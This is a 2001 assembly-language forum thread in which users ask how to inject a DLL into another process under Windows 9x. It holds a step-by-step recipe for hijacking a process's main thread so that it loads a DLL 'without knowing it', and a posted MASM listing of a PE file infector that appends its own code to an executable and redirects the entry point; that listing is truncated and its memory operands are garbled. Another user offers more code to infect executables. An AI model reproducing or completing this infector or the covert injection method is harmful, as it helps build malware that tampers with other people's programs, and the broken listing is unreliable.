How can I inject my DLL into address space of another process? I know how to do it with hooks, but that's not all that I need. I'm writing the API controlling program. The method with hooks doesn't get all the processes (when any process doesn't have windows or it is console program, with WINOLDAP only) I need the code, which could inject a DLL into address space for a given process handle under Win9x This message was edited by CHEMI$T, on 6/11/2001 9:49:04 PM
Posted on 2001-06-11 21:45:00 by CHEMI$T
Inserting a DLL into another processes address space isn't going to achieve anything, unless you are overwriting the code of a previous DLL, in which case it's probably better to re-jig that DLL. Of course, if you don't have access to the source for the program, then overwriting the code from it, it a particulary dangerous thing to do... still.... The functions you need are ones like VirtualProtect. I think there has been a discussion on this already here, have a search on the board. umbongo
Posted on 2001-06-12 06:39:00 by umbongo
It can be done and I have done it in my IczDump utility. The trick here is to "hypnotize" the target process to call LoadLibrary. The steps involved may be a little convoluted but below is the summarization: 1. Suspend the main thread of the target process then call GetThreadContext to obtain the values of various registers, including eip. 2. prepare the code that you will inject into the target process. This also includes fixing the relative/absolute addresses of jumps/calls in that code snippet. Of course, not every program imports LoadLibrary function but under win9x, the addresses of functions in system DLLs are always the same in all processes so you can call GetProcAddress to obtain the address of LoadLibrary in your program and hardcode that value into the code snippet 3. Calculate the size of the code snippet and find out the address where you will apply the patch. I choose the entrypoint address but it can be any arbitrary address so long as it's executable. 4. Save the original code in the target process that you will replace with your own LoadLibrary snippet so you can restore it later 5. Overwrite the code with your own snippet 6. Modify the value of EIP in the CONTEXT structure to point to the address of your snippet in the target process then call SetThreadContext 7. Resume the main thread of the target 8. The target will call LoadLibrary to load the DLL. 9. When LoadLibrary returns, in your own snippet, it will notify your program and then go into an infinite loop. I use Event object for this purpose. 10. When your program is notified, it suspends the main thread again, restores the code and then restores the values in CONTEXT structure and then calls SetThreadContext again. 11. The result is that, the target process loads the DLL without knowing it did so.
Posted on 2001-06-12 06:54:00 by Iczelion
Iczelion, are sources of IczDump available? If so where I can download them?
Posted on 2001-06-12 07:31:00 by vkim
It's currently not available
Posted on 2001-06-14 06:27:00 by Iczelion
Check out this article by Jeffrey Richter: "Load Your 32-bit DLL into Another Process's Address Space Using INJLIB," MSJ May 1994. I never tried it, but a little birdy told me it's relevant to your needs. ;-)
Posted on 2001-06-14 07:23:00 by Ernie
don't know if it possible via mempatch, too my prog below opens a pe file (mapping!) it increases the last sections and adds alignment and infection-mark stuff then it writes all data from label @start to @end_infection to the file and changes the entry point. if the infected file is run my prog gets kernel gets getmodulehandle gets getprocaddress and last but not least gets loadlibrary. it calls loadlibrary and INJECTS "user32.dll" in the modules address space (try a pe with no imports!) then it calls a little messagebox and pops control back to the host. have fun but don't change this code to do malicious thing :)

.model      flat, stdcall
option      casemap:none
include     \masm32\include\windows.inc
include     \masm32\include\kernel32.inc
include     \masm32\include\user32.inc
includelib  \masm32\lib\user32.lib
includelib  \masm32\lib\kernel32.lib

.DATA
            filename        db "test.exe",0
.DATA?
            fHandle         dd ?
            MapOfs          dd ?
            FileSize        dd ?
            Memory          dd ?
            mHandle         dd ?
            virlen          dd ?            

.CODE                                 
start:      
        mov     eax,offset @end_infection
        sub     eax,offset @start
        mov     virlen,eax

;++++++ open File
        invoke  CreateFile,addr filename,GENERIC_READ+GENERIC_WRITE,
                FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL
        cmp     eax,-1
        jz      closef
        mov     fHandle,eax

invoke  GetFileSize,fHandle,NULL
        mov     FileSize, eax          
        add     eax,virlen
        add     eax,1000
        mov     Memory,eax

invoke  CreateFileMapping,fHandle,NULL,PAGE_READWRITE,0,eax,NULL
        mov     mHandle,eax

invoke  MapViewOfFile,eax,FILE_MAP_WRITE,0,0,Memory
        mov     MapOfs,eax            
        mov     edx, eax
        push    edx

;++++++ check 'MZ' and 'PE' / EDX=IFH / ESI=IOH
        cmp     word ptr ,'ZM'             
        jnz     closef

add     edx,dword ptr          

cmp     word ptr ,'EP'             
        jnz     closef

cmp     dword ptr ,'KCUF' 
        jz      closef                       

;++++++ retrive LastSection / EBX=LAST SECTION
        mov     ebx, dword ptr 
        shl     ebx,3
        xor     eax,eax
        mov     ax, word ptr 
        dec     eax
        mov     ecx,28h
        push    edx
        mul     ecx
        pop     edx
        add     ebx,edx
        add     ebx,eax
        add     ebx,78h

;++++++ set new VirtualSize (OldValue + VirusLenght)
        mov     eax,virlen
        xadd    dword ptr ,eax          
        push    eax                             

add     eax,virlen                      
        push    dword ptr              

;++++++ set new SizeOfRawData (NewVirtualSize / FileAlignment + 1 * FilAlignment)
        push    edx                             
        mov     ecx,dword ptr          
        xor     edx,edx                         
        div     ecx                             
        xor     edx,edx
        inc     eax                             
        mul     ecx                             
        mov     dword ptr ,eax         
        pop     edx                             

;++++++ set new SizeOfImage (SizeOfImage + NewSizeOfRawData - OldSizeOfRawData)
        pop     ecx                             
        sub     eax,ecx                         
        add     dword ptr ,eax         

;++++++ set new EntryPoint (OldVirtualSize + VirtualAddress) / save oldEP + ImageBase
        pop     eax                             
        add     eax,dword ptr          
        xchg    dword ptr ,eax         

mov
Posted on 2001-06-14 16:25:00 by _drcmda
AAAARRRRGHHH i forget to mention: link this file's code section (.text) as CERW(CODE/EXECUTE/READ?/WRITE)
Posted on 2001-06-14 16:30:00 by _drcmda
Couldn't you use VirtualAlloc, CreateRemoteThread then LoadLibrary like BO does ? There was a thread on this board about this subject but i didn't get the search function to work.
Posted on 2001-06-14 18:18:00 by BJZ
Iczelion, is this program oriented onto WinNT? I need a code for Win9x. I already can make it in NT, I can't make it in windows, because I can't get Thread handle to operate with. In Win2k there is OpenThread(like OpenProcess), but it's not realized in Win9x. What can I do? P.S. I had a lot of work to do, so didna answer for a long time... Excuse me...
Posted on 2001-07-05 02:42:00 by CHEMI$T
chemi$t, i have exactly the same problem. under nt, i can use VirtualAllocEx() and CreateRemoteThread(), but there's no equivalent for w9x, so i am using a scheme similar to the one iczelion seens to used in iczdump... i hope you dont get these same problems, but maybe help know the ones i have: after overwriting the mz/pe header in the another process, and setting the EIP in the context, the new code dont run. i tried change the priority of the thread, and its suspended/resume state, but without success. seens some system processes are frozen, and this affect its thread... anybody know how i can make these processes run for a while, then restore their state? currently, i am studying the PROCESS_DATABASE and other structures residing in fs:0+ but i hope there's a clearer way to do this Vecna ps: iczelion,hutch,ernie: is ok to post code to infect executables here? i was told that no, but, if is allowed, as seens, i have really good code for this, and i want to share it. This message was edited by vecna, on 7/5/2001 12:47:54 PM
Posted on 2001-07-05 12:45:00 by vecna
Hi CHEMI$T, did you find a proper solution for Win9x for your problem by now? Without modifying PE files? I would be interested to hear about. japheth
Posted on 2001-07-06 13:48:00 by japheth
Hi All! vecna: could you please mail me that code? It''s very interesting. Pavel Dovgalenko japheth: For now I''ve just translated function from Jeffry Righter''s book to modify IAT table for a process to set your own function instead of API used by a process. But it works only with your own process. I could post it here, if someone needs it.
Posted on 2001-07-06 23:51:00 by CHEMI$T